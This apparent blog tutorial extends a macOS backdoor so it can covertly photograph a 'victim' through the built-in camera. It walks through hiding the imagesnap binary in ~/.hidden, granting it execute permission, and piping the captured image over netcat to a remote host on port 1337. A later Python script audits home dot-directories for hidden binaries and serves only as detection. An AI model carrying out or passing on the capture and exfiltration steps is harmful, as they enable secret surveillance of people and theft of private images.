Before following this tutorial, first read OSX Backdoor – Persistence.
Practically every Mac on the market comes with a built-in camera. What’s even more interesting is that these cameras do not require special user permissions to access. This means that an attacker can take pictures and view them from anywhere in the world, at any given moment, which can be a huge security and privacy risk. Assuming that you have already configured and installed the backdoor discussed in OSX Backdoor – Persistence, let’s add the ability to take pictures on a test victim’s computer.
./imagesnap
Capturing image from device "Built-in iSight"...snapshot.jpg
Looking good! Now let’s add this to our backdoor and give it permission to execute.
cp imagesnap ~/.hidden/
Note: If you are copying imagesnap to the hidden directory via the backdoor itself, imagesnap will not have permission to execute. This is a built-in safeguard that OSX implements to prevent software from executing foreign code. You must run the following line to give it proper permissions.
chmod +x ~/.hidden/imagesnap
We have successfully hidden our imagesnap executable in the test victim’s home directory. Try taking a snapshot using our backdoor shell. Now let’s send the snapshot home. First, start a listener on the “attacking” computer with Netcat on port 1337.
nc -l -p 1337 > ~/Desktop/snapshot.jpg
After you have first initiated your listener, send the file from the victim’s computer by piping the image through Netcat.
cat ~/.hidden/snapshot.jpg | nc my.site.here.com 1337
Note: If you are executing this line via your backdoor, you will have to resolve ~/.hidden/ to /Users/username/.hidden/.
If all went well, you should have a copy of the snapshot on your desktop.
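Seen from the defender's side, the steps above leave a Mach-O binary and captured images in a dot-directory of the user's home. The audit below is an added example, not code from this tutorial or its project: it lists such directories and records whether each binary already has an execute bit. The function names, the image extension list and the sample tree are assumptions constructed for illustration, and the heuristic will also match legitimate tool directories, so treat hits as leads to review.

```python
import os
import stat
import tempfile

# Mach-O magics: thin 32/64-bit, both byte orders, plus fat/universal.
MACHO_MAGICS = {0xfeedface, 0xcefaedfe, 0xfeedfacf, 0xcffaedfe, 0xcafebabe}
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".tiff")

def audit_home(home):
    """Find dot-dirs under `home` holding Mach-O files; note exec bit and images."""
    findings = []
    for entry in sorted(os.scandir(home), key=lambda e: e.name):
        if not entry.name.startswith(".") or not entry.is_dir(follow_symlinks=False):
            continue
        binaries, images = [], []
        for root, _dirs, files in os.walk(entry.path):
            for name in sorted(files):
                path = os.path.join(root, name)
                try:
                    mode = os.lstat(path).st_mode
                    if not stat.S_ISREG(mode):
                        continue  # skip symlinks, sockets, devices
                    if name.lower().endswith(IMAGE_EXTS):
                        images.append(path)
                        continue
                    with open(path, "rb") as fh:
                        if int.from_bytes(fh.read(4), "big") in MACHO_MAGICS:
                            binaries.append((path, bool(mode & 0o111)))
                except OSError:
                    continue  # unreadable entry: skip it, keep auditing
        if binaries:
            findings.append({"dir": entry.path, "binaries": binaries, "images": images})
    return findings

def build_sample_home():
    """Constructed sample tree mirroring the layout described above."""
    home = tempfile.mkdtemp(prefix="sample_home_")
    files = {".hidden/imagesnap": (b"\xcf\xfa\xed\xfe" + b"\x00" * 28, 0o755),  # fake Mach-O
             ".hidden/snapshot.jpg": (b"\xff\xd8\xff\xe0", 0o644),  # JPEG marker only
             ".config/settings.txt": (b"theme=dark\n", 0o644)}  # benign control
    for rel, (data, mode) in files.items():
        path = os.path.join(home, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
        os.chmod(path, mode)
    return home

if __name__ == "__main__":
    print(audit_home(build_sample_home()))
```

On a real system, pass a user's home directory to `audit_home` and compare the results against the developer tools that user is known to have installed.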
Here is the complete project on GitHub. If you found this interesting, give it a star. Thanks for reading.